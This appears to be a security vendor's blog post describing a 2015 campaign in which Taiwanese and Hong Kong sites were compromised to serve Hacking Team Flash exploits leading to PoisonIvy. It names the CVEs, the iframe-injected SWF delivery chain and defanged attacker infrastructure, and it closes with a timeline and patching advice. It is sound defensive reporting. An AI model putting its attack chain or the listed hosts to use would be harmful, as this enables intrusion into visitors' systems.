A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team and eventually download PoisonIvy and other payloads in user systems. This campaign started on July 9, a few days after the Hacking Team announced it was hacked.
The actors compromised the sites of a local television network, educational organizations, a religious institute, and a known political party in Taiwan; and a popular news site in Hong Kong. Note that the affected sites have consistent followers given the nature of their content. The affected educational organizations, for instance, are used to deliver employment exams for government employees. The Taiwanese television network involved has been producing and importing TV shows and movies for a decade.
We have notified the owners of the sites that are affected by the campaign; however, three sites are still compromised as of this writing.
Traces of Hacking Team Still Out There
The actors initially delivered a Flash Player exploit (CVE-2015-5119) found in the Hacking Team dump into pre-compromised sites a few days after the company announced it was hacked (July 5) and Adobe patched the flaw (July 7). The actors delivered a second wave of attack by delivering another Flash zero-day exploit (CVE-2015-5122) related to the Hacking Team.
Figure 1. Timeline of Flash exploits related to Hacking Team delivered to Taiwan and Hong Kong sites
Note that, at the start of the first and second wave of attacks, the actors included the same two educational organizations’ websites in Taiwan among its targets.
Figure 2. Screenshot of a religious organization’s site in Taiwan compromised to deliver CVE-2015-5122
PoisonIvy and Other Payloads
We found that all the compromised sites, save for the official site of a known Taiwanese political party, were injected with a malicious SWF using iframe which leads to the remote access tool (RAT) PoisonIvy, detected here as BKDR_POISON.TUFW, as the final payload. PoisonIvy is a popular RAT backdoor available in the underground market and typically used in targeted attacks. This backdoor has been known to capture screenshots, webcam images, and audio; log keystrokes and active window; delete, search, and upload files; and perform other intrusive routines.
The party’s site, on the other hand, has been observed to deliver a different payload embedded in a picture and detected as TROJ_JPGEMBED.F. The party’s site sends collected information to the same server as the other sites (223[.]27[.]43[.]32), leading us to believe that it is part of the same campaign.
Figure 3. Photo where a final payload of Hacking Team Flash exploit campaign is embedded
Although analysis is still ongoing to determine if this campaign is a targeted attack, we have found a suspicious domain wut[.]mophecfbr[.]com embedded in the payload which was listed in the command-and-control (C&C) list of a previously reported targeted attack dubbed “Tomato Garden.”
To protect machines from exploits and unwanted backdoor access, users should update Adobe Flash Player. You can verify if you’re using the latest version by checking the Adobe Flash Player page. It also helps to keep yourself updated with the latest news on popular software. Read more about recent Flash-related incidents and what users and companies can do on our blog post, “The Adobe Flash Conundrum: Old Habits Die Hard.”
Trend Micro detects all malware and exploits related to this incident. The SHA1s are outlined below:
Timeline of posts related to the Hacking Team
|July 5||The Italian company Hacking Team was hacked, with more than 400GB of confidential company data made available to the public.|
Three exploits – two for Flash Player and one for the Windows kernel—were initially found in the information dump. One of these [CVE-2015-5119] was a Flash zero-day.
The Windows kernel vulnerability (CVE-2015-2387) existed in the open type font manager module (ATMFD.dll) and can be exploited to bypass the sandbox mitigation mechanism.
|July 11||Two new Flash zero-day vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were found in the hacking team dump.|
|July 13||Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System (RCS) agent installed in their targets’ systems.|
|July 14||A new zero-day vulnerability (CVE-2015-2425) was found in Internet Explorer.|
|July 16||On the mobile front, a fake news app designed to bypass Google Play was discovered.|
|July 20||A new zero-day vulnerability (CVE-2015-2426) was found in Windows, which Microsoft fixed in an out-of-band patch.|
|July 21||Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in.|
|July 28||A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team.|